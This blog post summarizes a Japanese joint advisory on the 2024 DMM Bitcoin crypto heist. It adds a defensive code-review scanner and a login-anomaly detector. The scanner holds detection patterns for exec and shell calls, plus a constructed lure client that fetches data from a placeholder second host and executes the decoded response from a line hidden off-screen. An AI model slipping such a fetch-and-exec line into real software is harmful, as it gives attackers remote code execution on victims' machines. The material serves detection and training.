FSA Advisory: DMM Crypto Asset Heist
On December 24, 2024, Japanese authorities (the Financial Services Agency, the National Police Agency, and NISC) issued a joint advisory on the theft of crypto assets worth over $300 million from the exchange DMM Bitcoin in May 2024. The authorities attributed the attack to threat actors linked to North Korea (the group tracked as TraderTraitor). The advisory details how the attackers combined social engineering with technical exploitation to carry out the theft.
This blog post highlights key findings from the advisory, focusing on the attack methods and defensive measures recommended by the authorities.
Attack Methodology
The attackers employed a multi-stage approach that began with social engineering. Targets included individuals working in businesses related to crypto assets, both within and outside Japan. The attackers initiated contact by impersonating corporate executives and others on social media. Targets were approached using messages tailored to their professional background, for instance, asking software engineers for programming help or mentorship.
The attackers would often ask to move the conversation to a different social media platform or messaging app. The advisory noted this was likely done to take advantage of services that let a sender delete messages from the target's chat history, leaving the target with no record of what was discussed.
Malware Deployment
One specific method involved the attackers committing code to GitHub and claiming it contained bugs that needed investigating. The code, disguised as a simple API client program, was shared with targets under the pretense of needing help. The program was designed to communicate with both legitimate servers and malicious servers controlled by the attackers. The response-handling functions likely contained hidden code paths that executed data returned by the attackers' server, so that simply running the "buggy" program to reproduce the issue would fetch and deploy malware on the target's machine.
Credential Theft
Once a target's machine was infected, the attackers harvested authentication credentials and session cookies stored on it. With these they could impersonate legitimate users to access crypto asset management and blockchain-related systems. A replayed session cookie inherits an already authenticated session, so it requires neither the password nor a fresh MFA prompt, which is what makes cookie theft a natural follow-on to this kind of infection. The advisory noted that both corporate and personal crypto assets were potential targets.
Defensive Measures
The advisory outlines a comprehensive defense strategy that addresses both human awareness and system security. On the human side, employees are encouraged to be particularly vigilant when approached through social media. A simple but effective recommendation is to request video calls to verify the identity of unknown contacts. The advisory also emphasizes the importance of documenting suspicious approaches by taking screenshots of the interaction.
Organizations are urged to implement multi-factor authentication and adopt the principle of least privilege, granting permissions only for the scope and duration a task actually requires. Systems should be monitored for unusual activity, including access from unexpected locations, devices, or times, and for discrepancies between log sources. Accounts of former employees should be disabled promptly, with mechanisms in place to detect and respond to any login attempts against them, since an attempt on an account that should no longer work is itself a signal.
The advisory gives specific guidance on reviewing and executing code. Unfamiliar code should be run in a virtual machine rather than directly on an employee's own system. Shared code should be opened in a text editor with word wrap enabled, so that very long lines, a common place to hide obfuscated or malicious statements off the right edge of the screen, are fully visible during inspection. Employees are warned to be wary when pressured to review or execute unfamiliar code quickly.
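To make the code-review guidance concrete, here is an added example (not code from the advisory or from DMM Bitcoin) of a heuristic first-pass scanner for code received from an unsolicited contact. It looks for the three things the lure described above combines: a second host besides the API the program claims to use, a response handler that turns server data into executable code, and statements pushed off-screen by very long lines (the reason the advisory asks for word wrap). The rules, the `review_source` and `verdict` names, and the two constructed sample clients are assumptions for illustration; the hostnames are placeholders.

```python
"""
Heuristic first-pass review of source code received from an unsolicited contact.

Added example, not code from the advisory. The rules are assumptions chosen to
surface what the advisory describes: an "API client" that also talks to a second,
attacker-controlled host, a response handler that turns server data into code,
and statements pushed off-screen by very long lines (the reason for word wrap).
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

MAX_LINE_LEN = 200  # longer lines are only fully visible with word wrap enabled

RULES = {
    "dynamic-exec": re.compile(r"\b(exec|eval|compile|__import__)\s*\("),
    "decode-then-exec": re.compile(
        r"\b(exec|eval)\s*\(.*\b(b64decode|decompress|unhexlify|fromhex)\b"),
    "shell-or-import": re.compile(
        r"\b(subprocess\.(run|Popen|call|check_output)|os\.(system|popen)"
        r"|importlib\.import_module)\s*\("),
    "encoded-blob": re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"),
}
URL_RE = re.compile(r"https?://[^\s\"')]+")
HIGH_RISK = {"decode-then-exec", "unexpected-host", "long-line"}


@dataclass(frozen=True)
class Finding:
    line: int
    rule: str
    detail: str


def review_source(src: str, expected_hosts: set[str]) -> list[Finding]:
    """Scan src line by line; expected_hosts are the APIs the code claims to use."""
    findings: list[Finding] = []
    for no, line in enumerate(src.splitlines(), start=1):
        if len(line) > MAX_LINE_LEN:
            tail = line.rstrip()[-40:]
            findings.append(Finding(no, "long-line", f"{len(line)} chars, ends {tail!r}"))
        for name, rx in RULES.items():
            if rx.search(line):
                findings.append(Finding(no, name, line.strip()[:80]))
        for url in URL_RE.findall(line):
            host = urlparse(url).hostname
            if host and host not in expected_hosts:
                findings.append(Finding(no, "unexpected-host", host))
    return findings


def verdict(findings: list[Finding]) -> str:
    """Collapse findings into a decision for the reviewer."""
    rules = {f.rule for f in findings}
    if rules & HIGH_RISK:
        return "escalate"  # do not run outside a throwaway VM; report the approach
    if rules:
        return "review"    # read the flagged lines before running anything
    return "clean"         # no heuristic hits; this is not proof of safety


# Constructed sample resembling the lure in the advisory: a ticker client whose
# error path calls a second host and executes whatever it returns, hidden after
# 400 spaces so it sits off-screen in an editor without word wrap.
LURE_CLIENT = (
    "import base64\n"
    "import requests\n"
    "\n"
    "PRICE_API = 'https://api.example.com/v1/ticker'\n"
    "HELPER_API = 'https://telemetry.example.net/v1/check'\n"
    "\n"
    "def get_ticker(symbol):\n"
    "    return requests.get(PRICE_API, params={'s': symbol}, timeout=5).json()\n"
    "\n"
    "def handle_error(resp):\n"
    "    fix = requests.get(HELPER_API, timeout=5).json()\n"
    "    return fix.get('status')" + " " * 400 + "; exec(base64.b64decode(fix['patch']))\n"
)

# Constructed benign client for comparison.
CLEAN_CLIENT = (
    "import requests\n"
    "PRICE_API = 'https://api.example.com/v1/ticker'\n"
    "\n"
    "def get_ticker(symbol):\n"
    "    return requests.get(PRICE_API, params={'s': symbol}, timeout=5).json()\n"
)

if __name__ == "__main__":
    for label, src in (("lure", LURE_CLIENT), ("clean", CLEAN_CLIENT)):
        found = review_source(src, expected_hosts={"api.example.com"})
        print(f"{label}: {verdict(found)}")
        for f in found:
            print(f"  line {f.line}: {f.rule} ({f.detail})")
```

The scanner is a triage aid, not a sandbox: a "clean" verdict only means none of these patterns fired, which is why the advisory still wants unfamiliar code executed in a virtual machine. The "unexpected-host" rule is the one most specific to this lure, since a program that is supposedly a client for one API has no honest reason to contact a second server.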
The advisory also recommends storing logs centrally so that malware on a compromised host cannot tamper with or delete them, and so anomaly detection can run across the whole estate. Endpoint Detection and Response (EDR) should be used to spot discrepancies between what the logs say and what is actually happening on the system. Planting dummy credentials in browsers is another recommended measure: no legitimate user would ever use them, so any login attempt with those credentials is a reliable indicator that stored browser data has been stolen and replayed.
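The monitoring points above (unexpected location, device or time; attempts on former employees' accounts; use of planted dummy credentials) translate directly into detection rules over centrally stored authentication events. The following is an added example, not from the advisory or any product, showing those rules over a small constructed JSON-lines log. The event format, the per-user baselines, the `svc-wallet-backup` honeytoken name and the work-hours window are all assumptions; in practice the baselines come from weeks of history in the central log store.

```python
"""
Detection rules over authentication events for the anomalies the advisory asks
organizations to watch: access from an unexpected country or device, access at
unusual hours, login attempts on former employees' accounts, and any use of the
dummy credentials planted in browsers as bait.

Added example, not from the advisory or any product. The event format, the
per-user baselines, the honeytoken account name and the work-hours window are
assumptions for illustration; a real deployment derives baselines from history
in the central log store this page recommends.
"""
import json
from datetime import datetime, timedelta, timezone

JST = timezone(timedelta(hours=9))
WORK_HOURS = range(8, 21)  # 08:00-20:59 local counts as normal

# Assumed baselines, normally learned from weeks of centrally stored logs.
BASELINE = {
    "alice": {"countries": {"JP"}, "devices": {"alice-mbp"}},
    "bob": {"countries": {"JP"}, "devices": {"bob-win"}},
}
FORMER_EMPLOYEES = {"carol"}              # should be disabled; any attempt is an alert
HONEYTOKEN_USERS = {"svc-wallet-backup"}  # fake logins saved in browsers as bait


def classify(event: dict) -> list[str]:
    """Return the alert tags that apply to one login event (empty if benign)."""
    alerts: list[str] = []
    user = event["user"]
    if user in HONEYTOKEN_USERS:
        # Nobody legitimately uses a planted credential, so this alone is high
        # confidence that stored browser credentials were stolen and replayed.
        alerts.append("honeytoken-credential-used")
    if user in FORMER_EMPLOYEES:
        alerts.append("former-employee-login-attempt")
    base = BASELINE.get(user)
    if base is not None:
        if event["country"] not in base["countries"]:
            alerts.append("new-country")
        if event["device"] not in base["devices"]:
            alerts.append("new-device")
    local = datetime.fromisoformat(event["ts"]).astimezone(JST)
    if local.hour not in WORK_HOURS:
        alerts.append("off-hours")
    return alerts


def detect(lines: list[str]) -> list[tuple[int, str, list[str]]]:
    """Run classify over JSON-lines events; return (index, user, alerts) for hits."""
    hits = []
    for i, line in enumerate(lines):
        event = json.loads(line)
        alerts = classify(event)
        if alerts:
            hits.append((i, event["user"], alerts))
    return hits


# Constructed sample log (JSON lines) as pulled from a central store; timestamps are UTC.
SAMPLE_LOG = [
    '{"ts": "2024-05-31T02:15:00+00:00", "user": "alice", "country": "JP", "device": "alice-mbp", "result": "success"}',
    '{"ts": "2024-05-31T16:40:00+00:00", "user": "alice", "country": "US", "device": "alice-mbp", "result": "success"}',
    '{"ts": "2024-05-31T03:00:00+00:00", "user": "bob", "country": "JP", "device": "unknown-linux", "result": "success"}',
    '{"ts": "2024-05-31T01:00:00+00:00", "user": "carol", "country": "JP", "device": "carol-old", "result": "failure"}',
    '{"ts": "2024-05-31T05:00:00+00:00", "user": "svc-wallet-backup", "country": "DE", "device": "unknown", "result": "success"}',
    '{"ts": "2024-05-31T01:00:00+00:00", "user": "bob", "country": "JP", "device": "bob-win", "result": "failure"}',
]

if __name__ == "__main__":
    for idx, user, alerts in detect(SAMPLE_LOG):
        print(f"event {idx} user={user}: {', '.join(alerts)}")
```

Two design points worth noting. The former-employee and honeytoken rules fire regardless of whether the login succeeded, because the attempt itself is the evidence. And a stolen session cookie replayed from the attacker's machine shows up here as "new-device" or "new-country" on an otherwise valid account, which is exactly the access pattern the credential-theft stage of this attack produces.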
Incident Response
If a malware infection is suspected, the compromised machine should be isolated from the corporate network immediately, for example by disconnecting it or using the network containment feature of the EDR tool, but left powered on so that volatile evidence such as memory contents can be captured for forensic analysis. Powering off or reimaging the machine before that capture destroys the in-memory traces (running processes, network connections, unpacked payloads) that show what the malware did and what it took.
Looking Ahead
The crypto asset heist from DMM Bitcoin highlights how threat actors are running sophisticated campaigns targeting financial and technology companies. While technical security measures are important, the FSA advisory highlights how attackers are focusing on human targets, especially technical staff with access to critical systems. These threat actors combine social engineering and technical exploitation to breach systems through individual employees, including vendors.
Organizations and individuals are urged to remain vigilant and promptly report any suspicious communications to relevant government agencies, police, NISC, and cybersecurity-related organizations.
The joint advisory from Japanese authorities outlines key attack patterns and defensive measures in response to North Korea's ongoing cyber operations, reinforcing the importance of protecting against both social engineering and technical threats.